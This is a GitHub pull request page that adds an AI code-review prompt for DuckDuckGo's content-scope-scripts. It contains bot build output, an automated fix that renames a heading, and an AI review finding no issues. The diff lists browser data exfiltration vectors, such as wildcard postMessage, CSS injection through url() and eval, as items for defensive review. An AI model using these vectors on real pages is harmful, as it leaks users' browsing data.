Injected PR evaluation prompt

[jonathanKingston]

Asana Task/Github Issue: N/A

Description

Adds a new system prompt (.github/prompts/injected-pr-evaluation.md) tailored to evaluate Pull Requests for web compatibility and security issues within the Injected codebase and its messaging system.

Testing Steps

• N/A (This is a static markdown prompt file with no runtime behavior.)

Checklist

Please tick all that apply:

• I have tested this change locally
• I have tested this change locally in all supported browsers
• This change will be visible to users (as part of AI PR review)
• I have added automated tests that cover this change
• I have ensured the change is gated by config
• This change was covered by a ship review
• This change was covered by a tech design
• Any dependent config has been merged

---

  

[cursor]

Cursor Agent can help with this pull request. Just @cursor in comments and I'll start working on changes in this branch.
_{Learn more about Cursor Agents}

[github-actions]

Build Branch

Branch	pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5
Commit	86a0e88a8c
Updated	March 9, 2026 at 10:45:02 PM UTC

Static preview entry points

• Docs: docs/index.html
• Static pages: build/integration/pages/index.html
• Integration pages: injected/integration-test/test-pages/index.html

QR codes (mobile preview)

Entry point	QR code
Docs
Static pages
Integration pages

Integration commands

npm (Android / Extension):

npm i github:duckduckgo/content-scope-scripts#pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5

Swift Package Manager (Apple):

.package(url: "https://github.com/duckduckgo/content-scope-scripts.git", branch: "pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5")

git submodule (Windows):

git -C submodules/content-scope-scripts fetch origin pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5
git -C submodules/content-scope-scripts checkout origin/pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5

Pin to exact commit

npm (Android / Extension):

npm i github:duckduckgo/content-scope-scripts#86a0e88a8ce1455ec3d27156a046ed5f61df3705

Swift Package Manager (Apple):

.package(url: "https://github.com/duckduckgo/content-scope-scripts.git", revision: "86a0e88a8ce1455ec3d27156a046ed5f61df3705")

git submodule (Windows):

git -C submodules/content-scope-scripts fetch origin pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5
git -C submodules/content-scope-scripts checkout 86a0e88a8ce1455ec3d27156a046ed5f61df3705

[github-actions]

[Beta] Generated file diff

Time updated: Mon, 09 Mar 2026 22:45:31 GMT

[cursor]

Cursor Bugbot has reviewed your changes and found 1 potential issue.

Bugbot Autofix prepared a fix for the issue found in the latest run.

• ✅ Fixed: Prompt uses privacy-hostile term "user data"
  • Replaced the heading text 'URL construction with user data' with 'URL construction with page-derived data' to align with DuckDuckGo's privacy-first language guidelines.

Or push these changes by commenting:

@cursor push 1a4276c6b9

Preview (1a4276c6b9)

diff --git a/.github/prompts/injected-pr-evaluation.md b/.github/prompts/injected-pr-evaluation.md
--- a/.github/prompts/injected-pr-evaluation.md
+++ b/.github/prompts/injected-pr-evaluation.md
@@ -111,7 +111,7 @@
 ### 4. Data Exfiltration Vectors
 
 - **`postMessage` without origin restriction**: Any `window.postMessage()` or `iframe.contentWindow.postMessage()` without a specific `targetOrigin` (using `'*'`) leaks data to any listening frame.
-- **URL construction with user data**: Building URLs that include page-derived data (e.g., for image fetches, API calls) can leak browsing context to third parties. Verify all external URL construction.
+- **URL construction with page-derived data**: Building URLs that include page-derived data (e.g., for image fetches, API calls) can leak browsing context to third parties. Verify all external URL construction.
 - **`eval()` / `Function()` / `new Function()`**: Direct code execution from strings. The codebase avoids this in C-S-S itself (broker-protection serializes functions for native execution). Flag any new dynamic code execution.
 - **CSS injection**: If feature code injects `<style>` elements or sets `element.style` with page-derived values, CSS injection can exfiltrate data via `url()` or attribute selectors.
 - **fetch / XHR from content script**: Content script fetches may carry cookies and bypass CORS. Any new network requests from feature code are high-risk.

[github-actions]

⚠️ Cursor review was not successful.

This PR requires a manual review and approval from a member of one of the following teams:

• @duckduckgo/content-scope-scripts-owners
• @duckduckgo/apple-devs
• @duckduckgo/android-devs
• @duckduckgo/team-windows-development
• @duckduckgo/extension-owners
• @duckduckgo/config-aor
• @duckduckgo/breakage-aor
• @duckduckgo/breakage

[cursor]

Web Compatibility Assessment

No findings.

• .github/prompts/injected-pr-evaluation.md (entire file), severity: info: Documentation/prompt-only addition; no injected runtime behavior, API shims, prototype changes, or DOM mutations are introduced.

Security Assessment

No findings.

• .github/prompts/injected-pr-evaluation.md (entire file), severity: info: No changes to trust boundaries (message-bridge, transports, captured globals, origin checks, or config execution paths); this cannot create a direct exploitable runtime path.

Risk Level

Low Risk — this PR introduces a static review prompt file only and does not alter shipped JavaScript execution in page or native messaging contexts.

Recommendations

1. Add a CI check that validates required section headers in .github/prompts/injected-pr-evaluation.md to prevent prompt-format drift that could weaken automated review quality.
2. Add a short owner/maintenance note in the prompt (or adjacent docs) describing when architecture/security references should be updated, to reduce stale guidance risk over time.

---